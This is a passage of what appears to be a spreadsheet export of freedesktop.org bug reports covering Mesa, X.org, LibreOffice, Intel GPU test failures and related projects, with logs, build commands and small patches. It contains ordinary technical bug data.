IGT-Version: 1.6-gff3c122 (x86_64) (Linux: 3.15.0-rc3_drm-intel-next-queued_f83d65_20140525+ x86_64)
Aperture size is 4096 MiB
Total RAM is 3865 MiB
Subtest input-checking: SUCCESS
Subtest usage-restrictions: SUCCESS
Subtest invalid-mapping: SUCCESS
Subtest forbidden-operations: SUCCESS
Testing unsynchronized mappings...
Subtest create-destroy-unsync: SUCCESS
Subtest unsync-overlap: SUCCESS
Subtest unsync-unmap: SUCCESS
Subtest unsync-unmap-cycles: SUCCESS
Subtest unsync-unmap-after-close: SUCCESS
Using 2x2730 1MiB buffers
Verifying initialisation...
Cyclic blits cpu-&gt;gpu forward...
Cyclic blits gpu-&gt;cpu backward...
Random blits...
Subtest coherency-unsync: SUCCESS
gem_userptr_blits: gem_userptr_blits.c:650: sigbus: Assertion `0' failed.
Aborted
==Reproduce steps==
---------------------------- 
1.  ./gem_userptr_blits
==Bisect results==
----------------------------
commit 9911f3f0cf202444f1ef2399f5961605880b7360
Author:     Chris Wilson 
AuthorDate: Thu May 22 10:20:33 2014 +0100
Commit:     Chris Wilson 
CommitDate: Thu May 22 10:22:04 2014 +0100
    igt/gem_userptr_blits: Fix up last minute API changes
    When the patch was merged the ioctl numbers had to be adjusted to leave
    no holes. Also there was a final piece of munging of the API to
    downgrade unsynced userptr for export over dma-buf.
    Signed-off-by: Chris Wilson </t>
  </si>
  <si>
    <t>LIBREOFFICE-37691</t>
  </si>
  <si>
    <t>FILEOPEN: [RTF] embedded picture invisible rendering messed up.</t>
  </si>
  <si>
    <t>Created attachment 47250
The problematic .doc
I'm not sure how the .doc document was generated. I presume it was created by some scanner software. (Inspecting it in text editor reveals that it is a RTF file and most of the space in file is taken by the blob with the image.)
WinWord displays the .doc as expected: single page with a picture.
LO shows an empty page instead. Trying to type anything has no effect. ^A+^C doesn't help: nothing is pasted into the new document.</t>
  </si>
  <si>
    <t>thephilips</t>
  </si>
  <si>
    <t>DRI-97775</t>
  </si>
  <si>
    <t>[BSW] [BAT] kms_cursor_legacy/basic-cursor-vs-flip-varying-size subtest fails sporadically</t>
  </si>
  <si>
    <t>kms_cursor_legacy/basic-cursor-vs-flip-varying-size subtest fails sporadically with the below error log 
(kms_cursor_legacy:10701) WARNING: page flip 34 was delayed missed 1 frames
(kms_cursor_legacy:10701) CRITICAL: Test assertion failure function basic_cursor_vs_flip file kms_cursor_legacy.c:730:
(kms_cursor_legacy:10701) CRITICAL: Failed assertion: vbl.sequence == vblank_start + vrefresh
(kms_cursor_legacy:10701) CRITICAL: error: 14868 != 14867
Subtest basic-cursor-vs-flip-varying-size failed.
**** DEBUG ****
(kms_cursor_legacy:10701) DEBUG: Test requirement passed: found
(kms_cursor_legacy:10701) igt-kms-DEBUG: display: HDMI-A-2: set_pipe(C)
(kms_cursor_legacy:10701) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=1920 height=1080 format=0x34325258 tiling=0x0 size=0)
(kms_cursor_legacy:10701) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=1 pitch=7680)
(kms_cursor_legacy:10701) igt-kms-DEBUG: display: C.0: plane_set_fb(50)
(kms_cursor_legacy:10701) DEBUG: Test requirement passed: (output = set_fb_on_crtc(display pipe &amp;fb_info))
(kms_cursor_legacy:10701) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=64 height=64 format=0x34325241 tiling=0x0 size=0)
(kms_cursor_legacy:10701) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=2 pitch=256)
(kms_cursor_legacy:10701) DEBUG: Test requirement passed: cursor
(kms_cursor_legacy:10701) igt-kms-DEBUG: display: C.3: plane_set_fb(71)
(kms_cursor_legacy:10701) DEBUG: Test requirement passed: !(width &lt;= 64 &amp;&amp; height &lt;= 64)
(kms_cursor_legacy:10701) igt-fb-DEBUG: igt_create_fb_with_bo_size(width=256 height=256 format=0x34325241 tiling=0x0 size=0)
(kms_cursor_legacy:10701) igt-fb-DEBUG: igt_create_fb_with_bo_size(handle=3 pitch=1024)
(kms_cursor_legacy:10701) igt-kms-DEBUG: display: commit {
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     HDMI-A-2: Selecting pipe C
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetCrtc pipe A disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetPlane pipe A plane 1 disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetPlane pipe A plane 2 disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetCursor pipe A disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetCrtc pipe B disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetPlane pipe B plane 1 disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetPlane pipe B plane 2 disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetCursor pipe B disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     HDMI-A-2: SetCrtc pipe C fb 50 src (0 0) mode 1920x1080
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetPlane pipe C plane 1 disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetPlane pipe C plane 2 disabling
(kms_cursor_legacy:10701) igt-kms-DEBUG: display:     SetCursor pipe C fb 2 64x64
(kms_cursor_legacy:10701) igt-kms-DEBUG: display: }
(kms_cursor_legacy:10701) DEBUG: Test requirement passed: target &gt; 1
(kms_cursor_legacy:10701) DEBUG: Using a target of 16 cursor updates per half-vblank (60)
(kms_cursor_legacy:10701) WARNING: page flip 34 was delayed missed 1 frames
(kms_cursor_legacy:10701) CRITICAL: Test assertion failure function basic_cursor_vs_flip file kms_cursor_legacy.c:730:
(kms_cursor_legacy:10701) CRITICAL: Failed assertion: vbl.sequence == vblank_start + vrefresh
(kms_cursor_legacy:10701) CRITICAL: error: 14868 != 14867
****  END  ****</t>
  </si>
  <si>
    <t>MESA-72686</t>
  </si>
  <si>
    <t>GLSL preprocessor does not eat comments correctly</t>
  </si>
  <si>
    <t>The GLSL spec says Comments are each replaced by one space character as do the C and C++ specifications.  This means that C code such as
#define X a/*
*/b
X
will produce
# 1 /tmp/foo.c
# 1 
# 1 /tmp/foo.c
a b
It also means that GLSL code such as
#version 120
#define X gl_Position/*
*/ =
void main()
{
   X vec4(0.)
}
should compile as if it were
#version 120
void main()
{
   gl_Position = vec4(0.)
}
On Mesa this generates an error:
0:3(3): error: syntax error unexpected '='</t>
  </si>
  <si>
    <t>PULSEAUDIO-46900</t>
  </si>
  <si>
    <t>Update Ukrainian translation</t>
  </si>
  <si>
    <t>Created attachment 57924
Patch to update Ukrainian translation
Current Ukrainian translation is outdated. Transifex translation is disabled. Developers left no way to contribute translations other than bug reporting. Translations of KMix interface are incomplete due to this situation.
Attached is a patch to update Ukrainian translation.
Many thanks for committing it.</t>
  </si>
  <si>
    <t>PKG-CONFIG-70690</t>
  </si>
  <si>
    <t>reserved identifier violation</t>
  </si>
  <si>
    <t>I would like to point out that identifiers like _Flag and _Package do not fit to the expected naming convention of the C language standard.
http://cgit.freedesktop.org/pkg-config/tree/pkg.h?id=715cc306b0e4add06523b8fcce49867da469a728#n48
Would you like to adjust your selection for unique names?
https://www.securecoding.cert.org/confluence/display/seccode/DCL37-C.+Do+not+declare+or+define+a+reserved+identifier</t>
  </si>
  <si>
    <t>Markus.Elfring</t>
  </si>
  <si>
    <t>LIBREOFFICE-56886</t>
  </si>
  <si>
    <t>WMF contents not shown</t>
  </si>
  <si>
    <t>Created attachment 69765
WMF-containing file whose wmf is shown all white.
I have a file which contains a WMF file which shows a scientific curve (Proton resonance). Perhaps it was created with MestreC. Libre office shows it as blank. I have multiple of those but cant show more until it is published.</t>
  </si>
  <si>
    <t>LIBREOFFICE-35324</t>
  </si>
  <si>
    <t>FILEOPEN particular .docx: Watermark background picture shown in foreground</t>
  </si>
  <si>
    <t>Created attachment 44472
Zipped both the original docx file and the odt file saved using MSOffice 2010
I got a docx file that did not open correctly i LibreOffice (nor Goggle Docs). But I then opened the file with Microsoft Office 2010 and than saved it as an odt. Now this odt file could be opened correctly with LibreOffice.
I attach both the original docx file and the odt file saved using MSOffice 2010.
Regards Dan</t>
  </si>
  <si>
    <t>dan</t>
  </si>
  <si>
    <t>XORG-2810</t>
  </si>
  <si>
    <t>Dialog box reminding how to switch back to Quartz not uptodate</t>
  </si>
  <si>
    <t>The dialog box that pops up when I start XDarwin (in fullscreen mode) tells me I
can hit command-option-Q to switch back to Quartz even though I've actually
configured it to obey to command-option-A instead.</t>
  </si>
  <si>
    <t>monnier</t>
  </si>
  <si>
    <t>MESA-80115</t>
  </si>
  <si>
    <t>MESA_META_DRAW_BUFFERS induced GL_INVALID_VALUE errors</t>
  </si>
  <si>
    <t>Hi
After upgrading to mesa-10.2.1 I began to see a lot of GL_INVALID_VALUE errors under kde eg
kwin(982) KWin::checkGLError: GL error ( PostPaint ):  GL_INVALID_VALUE
With mesa-10.1.5 no such errors occur. Modifying a MESA_DEBUG message in mesa-10.2.1/src/mesa/main/buffers.c:_mesa_DrawBuffers():303 to print actual values gives
Mesa: User error: GL_INVALID_VALUE in glDrawBuffersARB(n: 8 Const.MaxDrawBuffers: 1)
kwin(908) KWin::checkGLError: GL error ( update texture ):  GL_INVALID_VALUE
It turns out that the problem appears in the mesa-10.2.1-rc1 -&gt; mesa-10.2.1-rc2 transition with this set of commits:
2014-05-07 meta: Only clear the requested color buffers.                        Kenneth Graunke 1 -2/+49
2014-05-07 meta: Add infrastructure for saving/restoring the DrawBuffers state. Kenneth Graunke 2 -0/+42
2014-05-07 meta: Add a new MESA_META_DRAW_BUFFERS bit.                          Kenneth Graunke 4 -4/+6
I have a bunch of laptops mostly kinda old and several have radeon graphics controllers eg RV200/M7 [Mobility Radeon 7500]. It turns out that the MESA_META_DRAW_BUFFERS commit (specifically the Add infrastructure for saving/restoring .. commit) uses MAX_DRAW_BUFFERS and passes this value to _mesa_DrawBuffers():
diff --git a/src/mesa/drivers/common/meta.c b/src/mesa/drivers/common/meta.c
index 36150a5..7c84c33 100644
--- a/src/mesa/drivers/common/meta.c
+++ b/src/mesa/drivers/common/meta.c
@@ -11766 +121110 @@ _mesa_meta_end(struct gl_context *ctx)
        ctx-&gt;CurrentRenderbuffer-&gt;Name != save-&gt;RenderbufferName)
       _mesa_BindRenderbuffer(GL_RENDERBUFFER save-&gt;RenderbufferName)
+   if (state &amp; MESA_META_DRAW_BUFFERS) {
+      _mesa_DrawBuffers(MAX_DRAW_BUFFERS save-&gt;ColorDrawBuffers)
+   }
+
    ctx-&gt;Meta-&gt;SaveStackDepth--
Then in mesa-10.2.1/src/mesa/main/buffers.c:_mesa_DrawBuffers():303 we have
315     * From the OpenGL 3.0 specification page 258:
316     * An INVALID_VALUE error is generated if n is greater than
317     *  MAX_DRAW_BUFFERS.
318     */
319    if (n  (GLsizei) ctx-&gt;Const.MaxDrawBuffers) {
320       _mesa_error(ctx GL_INVALID_VALUE glDrawBuffersARB(n))
321       return
322    }
For the radeon case ctx-&gt;Const.MaxDrawBuffers = 1 while MAX_DRAW_BUFFERS = 8 hence the error.
As a quick fix to have mesa-10.2.1 usable for radeon controllers I use a simple patch:
---
Attempting to draw MAX_DRAW_BUFFERS here results in many INVALID_VALUE errors
in _mesa_DrawBuffers() at least for [AMD/ATI] RV200/M7 [Mobility Radeon 7500]
chips (Radeon driver) where ctx-&gt;Const.MaxDrawBuffers=1 is less than MAX_DRAW_BUFFERS.
Do not try to draw more saved color buffers than we actually have saved.
diff -Npur mesa-10.2.1.old/src/mesa/drivers/common/meta.c mesa-10.2.1.new/src/mesa/drivers/common/meta.c
--- mesa-10.2.1.old/src/mesa/drivers/common/meta.c      2014-05-30 18:09:47.000000000 -0400
+++ mesa-10.2.1.new/src/mesa/drivers/common/meta.c      2014-06-16 19:57:14.505961190 -0400
@@ -12137 +121310 @@ _mesa_meta_end(struct gl_context *ctx)
       _mesa_BindRenderbuffer(GL_RENDERBUFFER save-&gt;RenderbufferName)
    if (state &amp; MESA_META_DRAW_BUFFERS) {
-      _mesa_DrawBuffers(MAX_DRAW_BUFFERS save-&gt;ColorDrawBuffers)
+      int c = 0
+      while (save-&gt;ColorDrawBuffers[c] &amp;&amp; c ColorDrawBuffers))
+          ++c
+      _mesa_DrawBuffers(c save-&gt;ColorDrawBuffers)
    }
    ctx-&gt;Meta-&gt;SaveStackDepth--
---
As long as memset() is used (mesa-10.2.1/src/mesa/drivers/common/meta.c:_mesa_meta_begin():796):
802       memset(save-&gt;ColorDrawBuffers 0 sizeof(save-&gt;ColorDrawBuffers))
this appears to be safe however maybe it would be more efficient to save the actual number of saved buffers (real_color_buffers in meta.c) in a new parameter under ctx?
thanks much for your time and the great software
John
john@juluka: ~
$ cat 00-mesa-10.2.1-GL_INVALID_VALUE.br
Hi
After upgrading to mesa-10.2.1 I began to see a lot of GL_INVALID_VALUE errors under kde eg
kwin(982) KWin::checkGLError: GL error ( PostPaint ):  GL_INVALID_VALUE
With mesa-10.1.5 no such errors occur. Modifying a MESA_DEBUG message in mesa-10.2.1/src/mesa/main/buffers.c:_mesa_DrawBuffers():303 to print actual values gives
Mesa: User error: GL_INVALID_VALUE in glDrawBuffersARB(n: 8 Const.MaxDrawBuffers: 1)
kwin(908) KWin::checkGLError: GL error ( update texture ):  GL_INVALID_VALUE
It turns out that the problem appears in the mesa-10.2.1-rc1 -&gt; mesa-10.2.1-rc2 transition with this set of commits:
2014-05-07 meta: Only clear the requested color buffers.                        Kenneth Graunke 1 -2/+49
2014-05-07 meta: Add infrastructure for saving/restoring the DrawBuffers state. Kenneth Graunke 2 -0/+42
2014-05-07 meta: Add a new MESA_META_DRAW_BUFFERS bit.                          Kenneth Graunke 4 -4/+6
I have a bunch of laptops mostly kinda old and several have radeon graphics controllers eg RV200/M7 [Mobility Radeon 7500]. It turns out that the MESA_META_DRAW_BUFFERS commit (specifically the Add infrastructure for saving/restoring .. commit) uses MAX_DRAW_BUFFERS and passes this value to _mesa_DrawBuffers():
diff --git a/src/mesa/drivers/common/meta.c b/src/mesa/drivers/common/meta.c
index 36150a5..7c84c33 100644
--- a/src/mesa/drivers/common/meta.c
+++ b/src/mesa/drivers/common/meta.c
@@ -11766 +121110 @@ _mesa_meta_end(struct gl_context *ctx)
        ctx-&gt;CurrentRenderbuffer-&gt;Name != save-&gt;RenderbufferName)
       _mesa_BindRenderbuffer(GL_RENDERBUFFER save-&gt;RenderbufferName)
+   if (state &amp; MESA_META_DRAW_BUFFERS) {
+      _mesa_DrawBuffers(MAX_DRAW_BUFFERS save-&gt;ColorDrawBuffers)
+   }
+
    ctx-&gt;Meta-&gt;SaveStackDepth--
Then in mesa-10.2.1/src/mesa/main/buffers.c:_mesa_DrawBuffers():303 we have
315     * From the OpenGL 3.0 specification page 258:
316     * An INVALID_VALUE error is generated if n is greater than
317     *  MAX_DRAW_BUFFERS.
318     */
319    if (n  (GLsizei) ctx-&gt;Const.MaxDrawBuffers) {
320       _mesa_error(ctx GL_INVALID_VALUE glDrawBuffersARB(n))
321       return
322    }
For the radeon case ctx-&gt;Const.MaxDrawBuffers = 1 while MAX_DRAW_BUFFERS = 8 hence the error.
As a quick fix to have mesa-10.2.1 usable for radeon controllers I use a simple patch:
---
Attempting to draw MAX_DRAW_BUFFERS here results in many INVALID_VALUE errors
in _mesa_DrawBuffers() at least for [AMD/ATI] RV200/M7 [Mobility Radeon 7500]
chips (Radeon driver) where ctx-&gt;Const.MaxDrawBuffers=1 is less than MAX_DRAW_BUFFERS.
Do not try to draw more saved color buffers than we actually have saved.
diff -Npur mesa-10.2.1.old/src/mesa/drivers/common/meta.c mesa-10.2.1.new/src/mesa/drivers/common/meta.c
--- mesa-10.2.1.old/src/mesa/drivers/common/meta.c      2014-05-30 18:09:47.000000000 -0400
+++ mesa-10.2.1.new/src/mesa/drivers/common/meta.c      2014-06-16 19:57:14.505961190 -0400
@@ -12137 +121310 @@ _mesa_meta_end(struct gl_context *ctx)
       _mesa_BindRenderbuffer(GL_RENDERBUFFER save-&gt;RenderbufferName)
    if (state &amp; MESA_META_DRAW_BUFFERS) {
-      _mesa_DrawBuffers(MAX_DRAW_BUFFERS save-&gt;ColorDrawBuffers)
+      int c = 0
+      while (save-&gt;ColorDrawBuffers[c] &amp;&amp; c ColorDrawBuffers))
+          ++c
+      _mesa_DrawBuffers(c save-&gt;ColorDrawBuffers)
    }
    ctx-&gt;Meta-&gt;SaveStackDepth--
---
As long as memset() is used (mesa-10.2.1/src/mesa/drivers/common/meta.c:_mesa_meta_begin():796):
802       memset(save-&gt;ColorDrawBuffers 0 sizeof(save-&gt;ColorDrawBuffers))
this appears to be safe however maybe it would be more efficient to save the actual number of saved buffers (real_color_buffers in meta.c) in a new parameter under ctx?
thanks much for your time and the great software
John</t>
  </si>
  <si>
    <t>HAL-19961</t>
  </si>
  <si>
    <t>type of portable_audio_player.playlist_path is inconsistent</t>
  </si>
  <si>
    <t>The playlist_path property is a string for some devices and a strlist for others.  I'm not sure if this was always the case (I'm sure it worked before..) but this means applications wanting to use this property have to check both types.</t>
  </si>
  <si>
    <t>DRI-100672</t>
  </si>
  <si>
    <t>[BAT][HSW] igt@gem_exec_fence@nb-await-default incomplete in CI</t>
  </si>
  <si>
    <t>https://intel-gfx-ci.01.org/CI/Patchwork_4422/fi-hsw-4770/igt@gem_exec_fence@nb-await-default.html</t>
  </si>
  <si>
    <t>MESA-91130</t>
  </si>
  <si>
    <t>Mesa's cl.h defines CL_VERSION_1_2 even though it is missing some OpenCL 1.2 functions</t>
  </si>
  <si>
    <t>`clEnqueueFillBuffer` is part of OpenCL 1.2 [1] [2].
Mesa claims to support OpenCL 1.2:
```
# grep -B1 CL_VERSION /usr/include/CL/cl.h
/* OpenCL Version */
#define CL_VERSION_1_0                              1
#define CL_VERSION_1_1                              1
#define CL_VERSION_1_2                              1
```
It declares `clEnqueueFillBuffer`:
```
# grep -B1 -A8 clEnqueueFillBuffer /usr/include/CL/cl.h
extern CL_API_ENTRY cl_int CL_API_CALL
clEnqueueFillBuffer(cl_command_queue   /* command_queue */
                    cl_mem             /* buffer */ 
                    const void *       /* pattern */ 
                    size_t             /* pattern_size */ 
                    size_t             /* offset */ 
                    size_t             /* size */ 
                    cl_uint            /* num_events_in_wait_list */ 
                    const cl_event *   /* event_wait_list */ 
                    cl_event *         /* event */) CL_API_SUFFIX__VERSION_1_2
```
But does not define it:
```
# scanelf -s clEnqueueFillBuffer /usr/lib/libOpenCL.so
 TYPE   SYM FILE 
ET_DYN  -  /usr/lib/libOpenCL.so 
```
Logically it also seems to be missing in the API dispatcher [1].
I assume Mesa should not claim to support OpenCL 1.2 via `CL_VERSION_1_2` if at least one of the OpenCL 1.2 functions is not implemented.
[1]: https://www.khronos.org/registry/cl/sdk/1.2/docs/man/xhtml/clEnqueueFillBuffer.html
[2]: https://www.khronos.org/registry/cl/specs/opencl-1.2.pdf#page=85
[3]: http://cgit.freedesktop.org/mesa/mesa/tree/src/gallium/state_trackers/clover/api/dispatch.cpp#n129</t>
  </si>
  <si>
    <t>devurandom</t>
  </si>
  <si>
    <t>MESA-52167</t>
  </si>
  <si>
    <t>llvmpipe test programs link fails when ld --as-needed option is used</t>
  </si>
  <si>
    <t>llvmpipe test programs link fails when ld --as-needed option is used:
Making all in llvmpipe
gmake[1]: Entering directory `/home/blino/vc/mageia/packages/cauldron/mesa/BUILD/mesa-20120715/src/gallium/drivers/llvmpipe'
g++ -Wl--as-needed -Wl-zrelro -Wl-O1 -Wl--build-id -Wl--enable-new-dtags -L/usr/lib64/llvm  -lpthread -lffi -ldl -lm  lp_test_blend.o lp_test_main.o -o lp_test_blend -Wl--start-group  -L../../auxiliary/ -lgallium libllvmpipe.a -lLLVM  -lXext -lXdamage -lXfixes -lX11-xcb -lX11 -lxcb-glx -lxcb -lXxf86vm   -ldrm   -lm -lpthread -ldl -Wl--end-group
/usr/bin/ld: ../../auxiliary//libgallium.a(u_dl.o): undefined reference to symbol 'dlclose@@GLIBC_2.2.5'
/usr/bin/ld: note: 'dlclose@@GLIBC_2.2.5' is defined in DSO /usr/lib/gcc/x86_64-mageia-linux-gnu/4.7.1/../../../../lib64/libdl.so so try adding it to the linker command line
/usr/lib/gcc/x86_64-mageia-linux-gnu/4.7.1/../../../../lib64/libdl.so: could not read symbols: Invalid operation
collect2: error: ld returned 1 exit status
gmake[1]: *** [lp_test_blend] Error 1
gmake[1]: Leaving directory `/home/blino/vc/mageia/packages/cauldron/mesa/BUILD/mesa-20120715/src/gallium/drivers/llvmpipe'
My ld configuration is the following:
LD='/usr/bin/ld -m elf_x86_64'
LDFLAGS=' -Wl--as-needed -Wl-zrelro -Wl-O1 -Wl--build-id -Wl--enable-new-dtags'
Link goes fine is all existing -ldl options are removed and one extra occurence of -ldl is added after the --end-group option:
g++ -Wl--as-needed -Wl-zrelro -Wl-O1 -Wl--build-id -Wl--enable-new-dtags -L/usr/lib64/llvm  -lpthread -lffi -lm  lp_test_blend.o lp_test_main.o -o lp_test_blend -Wl--start-group  -L../../auxiliary/ -lgallium libllvmpipe.a -lLLVM  -lXext -lXdamage -lXfixes -lX11-xcb -lX11 -lxcb-glx -lxcb -lXxf86vm   -ldrm   -lm -lpthread -Wl--end-group -ldl</t>
  </si>
  <si>
    <t>LIBREOFFICE-32626</t>
  </si>
  <si>
    <t>Contributor Credits: Page Not Found</t>
  </si>
  <si>
    <t>I found that with LibreOffice 3.3.0 RC2 - WIN XP German UI  [OOO330m18 (build 3.3.0.2)]
Steps to reproduce:
1. Start LibO (to Start Center)
2. Menu 'Help -&gt; Info'
   Message About LibreOffice appears
3. Click link Contributor credits 
   expected: credits
   actual: Page with error message 
           Sorry the page you tried to visit was not found
May be the Credits page has been moved? Related to Bug 32333?</t>
  </si>
  <si>
    <t>XORG-89756</t>
  </si>
  <si>
    <t>xorg.conf devices don't get re-enabled after VT switch</t>
  </si>
  <si>
    <t>Start a systemd-logind enabled server with xorg.conf with AutoAddDevices off and a mouse + kbd driver device. server is suid root.
systemd_logind_controls_session() returns 1 if systemd can be initialized but the devices are /dev/tty and /dev/input/mice. After a VT switch xf86VTEnter() skips over the xf86EnableInputDeviceForVTSwitch() loop and leaves us with dead devices.
xinput enable  restores the devices. 
Not 100% sure what we should do there. Maybe check the driver flags for server FD support? Or probably better: remember which devices were opened by systemd-logind and re-enable all but those.</t>
  </si>
  <si>
    <t>MESA-110291</t>
  </si>
  <si>
    <t>Vega 64 GPU hang running Space Engineers</t>
  </si>
  <si>
    <t>Created attachment 143821
Hang report
Space Engineers is causing GPU hangs. It's something about the terrain that does it - playing in space works fine for hours at a time but starting a new game on a planet hangs in a minute or two.
Terrain is really messed up on planets so there's probably game or Wine bugs at work too.
Hang report attached. Despite talking about /tmp/radv-trace.txt a lot it didn't actually create this file.
System:
Ryzen 2700X
Vega 64
llvm trunk r357123
mesa-19.0_g893425a607a
kernel 5.0.1
wine-staging 4.5 from https://github.com/lutris/wine
DXVK 1.0.1
Graphics settings: 3840x2160 medium detail</t>
  </si>
  <si>
    <t>zurohki</t>
  </si>
  <si>
    <t>LIBREOFFICE-84009</t>
  </si>
  <si>
    <t>EDITING: wrong sorting when copying results to another sheet</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. open new spreadsheet and add a second sheet
2. in Sheet1 insert values 1 to 10 in range A1:A10
3. menu Data-&gt;Sort... key Column A order Descending
4. select tab Options -&gt; Copy sort results to... then enter Sheet2.A1 as destination
5. validate
Expected behavior:
Values should appear sorted in Sheet2 and unmodified on Sheet1.
What happens:
Values are copied unsorted on Sheet2 while sorted on Sheet1.
It seems that LibO sorts the good destination cell range but with reference to the source sheet : try copying to Sheet2.A2 instead of Sheet2.A1...
Sorting is done correctly in LibO 4.2.
Tested on Windows 7 Windows XP and LinuxMint.
I mark this bug as critical sorting being a basic feature of spreadsheets !
Thanks in advance for having a look.</t>
  </si>
  <si>
    <t>jm.zambon</t>
  </si>
  <si>
    <t>POPPLER-26802</t>
  </si>
  <si>
    <t>Fix some msvc warnings</t>
  </si>
  <si>
    <t>This small patch removes some nasty msvc warnings. Especially the changes in the headers are important as they're included in other projects and produce a lot of unneeded output.
The diff is against 0.12.4</t>
  </si>
  <si>
    <t>ch.ehrlicher</t>
  </si>
  <si>
    <t>POPPLER-85821</t>
  </si>
  <si>
    <t>make dist is broken</t>
  </si>
  <si>
    <t>.moc files are included when they didn't use to get included. This breaks compilation in out of source builds.</t>
  </si>
  <si>
    <t>XORG-2076</t>
  </si>
  <si>
    <t>Using mouse with some KVMs causes mouse to go crazy</t>
  </si>
  <si>
    <t>I have a Belkin Omniview SE 4-port KVM. It worked fine with my generic optical
wheel mouse with X11. Under Fedora Core using XOrg changing between desktops
using the KVM causes the mouse to overreact and start clicking things as you
move the mouse -- i.e. you nudge the mouse and the pointer shoots clear across
the screen and starts clicking on menu options by itself.
System is an Athlon 1100 with 3/4 of a Gig of ram running Fedora Core 3 on a
Belkin Omniview SE KVM with a generic optical scroll mouse. XOrg was installed
from the Fedora RPMs and system is updated with all the latest updates from the
Fedora Project using up2date. 
I consider this to be a major headache as I am unable to use the local console
and have to rely on VNC to log into my machine even from the local console
(from my wife's Windows box.) 
I do not believe that replacing the KVM is an acceptable answer as one day it
worked fine with RH 9 then the next day after installing FC3 over RH9 it
starts acting up. No hardware changes were made to the system.</t>
  </si>
  <si>
    <t>MESA-62434</t>
  </si>
  <si>
    <t>[bisected] 3284.073] (EE) AIGLX error: dlopen of /usr/lib/xorg/modules/dri/r600_dri.so failed (/usr/lib/libllvmradeon9.2.0.so: undefined symbol: lp_build_tgsi_intrinsic)</t>
  </si>
  <si>
    <t>Upon starting x loading r600_dri.so fails
first bad commit : http://cgit.freedesktop.org/mesa/mesa/commit/?id=f70c3853513637fa6ed38e75f73d472a9fa61213
-------------------------------------------------------------
  ./autogen.sh --prefix=/usr \
    --sysconfdir=/etc \
    --with-dri-driverdir=/usr/lib/xorg/modules/dri \
    --with-gallium-drivers=r300r600radeonsiswrast \
    --with-dri-drivers=swrast \
    --enable-gallium-llvm \
    --enable-egl \
    --enable-gallium-egl \
    --with-egl-platforms=x11drmwayland \
    --enable-shared-glapi \
    --enable-gbm \
    --enable-glx-tls \
    --enable-dri \
    --enable-glx \
    --enable-osmesa \
    --enable-gles1 \
    --enable-gles2 \
    --enable-texture-float \
    --enable-xa \
    --enable-vdpau \
    --enable-gallium-gbm \
    --enable-gallium-g3dvl \
    --enable-xvmc \
    --enable-xorg \
    --enable-r600-llvm-compiler \
    --with-llvm-shared-libs
---------------------------------------------------
I've chosen blocker as severity as this commit is a candidate for the 9.1 branch</t>
  </si>
  <si>
    <t>lonewolf</t>
  </si>
  <si>
    <t>XORG-12007</t>
  </si>
  <si>
    <t>TV output garbled with RV280</t>
  </si>
  <si>
    <t>The TV output of my ATI Radeon 9200 (RV280) is garbled.
It looks like black and white noise but the pattern changes when I move windows around.
My TV is connected to the Radeon's S-Video connector over a SCART adapter.
The old GATOS TV-out patch worked with my setup.
I've tested the latest GIT (randr-1.2 branch).</t>
  </si>
  <si>
    <t>jasmin-bugfd</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-2212</t>
  </si>
  <si>
    <t>XCB subdomain points to main freedesktop.org page not XCB page</t>
  </si>
  <si>
    <t>The XCB subdomain  points to the main
freedesktop.org page not the XCB page .</t>
  </si>
  <si>
    <t>LIBOIL-11199</t>
  </si>
  <si>
    <t>problem compiling liboil 0.3.12 on Solaris</t>
  </si>
  <si>
    <t>liboil 0.3.12 won't compile on Solaris because Solaris does not support the vasprintf function.  The attached patch works around this problem for now.  I'd like to hear how you'ld like me to better fix this and I'll be happy to write a better patch.</t>
  </si>
  <si>
    <t>LIBREOFFICE-84159</t>
  </si>
  <si>
    <t>example of ppt file which comes out very badly on Impress</t>
  </si>
  <si>
    <t>Created attachment 106639
ppt file generated on Microsoft
I am including 2 files one a ppt and the second a pdf. We wanted to use LibreOffice but were forced to use Microsoft Office.
1) Most of the users in the group used Microsoft
2) LibreOffice did a very poor job with this particular data
The pdf file is how the data actually looks and how it looks inside the Microsoft product. I have Ubuntu here and use ONLY LibreOffice.
I would like to present this sample data in the hopes that it might be useful in fixing some bugs which make LibreOffice incompatible with Microsoft. The ideal would be that LibreOffice replaces Microsoft.
Thanks
Ilan
P.S. I can't add 2 attachments. I'll submit this and see if it will let me add the pdf</t>
  </si>
  <si>
    <t>ilan.tal</t>
  </si>
  <si>
    <t>XORG-10480</t>
  </si>
  <si>
    <t>X crashes/restarts in XEmacs Query/Replace when Query string starts with tab character</t>
  </si>
  <si>
    <t>Hi
When I do an Alt-% Query/Replace operation in Xemacs and the Query string
begins with a tab character as soon as I hit the return key to enter the
replacement string X crashes and restarts and I have to log in again.
Some information:
&gt; X -version
X Window System Version 7.1.1
Release Date: 12 May 2006
X Protocol Version 11 Revision 0 Release 7.1.1
Build Operating System: Linux 2.6.9-42.0.8.ELsmp i686 Red Hat Inc.
Current Operating System: Linux clifford 2.6.20-1.2933.fc6 #1 SMP Mon Mar 19 11:38:26 EDT 2007 i686
Build Date: 28 February 2007
Build ID: xorg-x11-server 1.1.1-47.7.fc6 
        Before reporting problems check http://wiki.x.org
        to make sure that you have the latest version.
Module Loader present
&gt; uname -a
Linux clifford 2.6.20-1.2933.fc6 #1 SMP Mon Mar 19 11:38:26 EDT 2007 i686 i686 i386 GNU/Linux
&gt; cat /etc/redhat-release 
Fedora Core release 6 (Zod)$ xemacs -version
  Loading /usr/share/xemacs/site-packages/lisp/site-start.d/rpmdev-init.el...
  Loading leim-list...
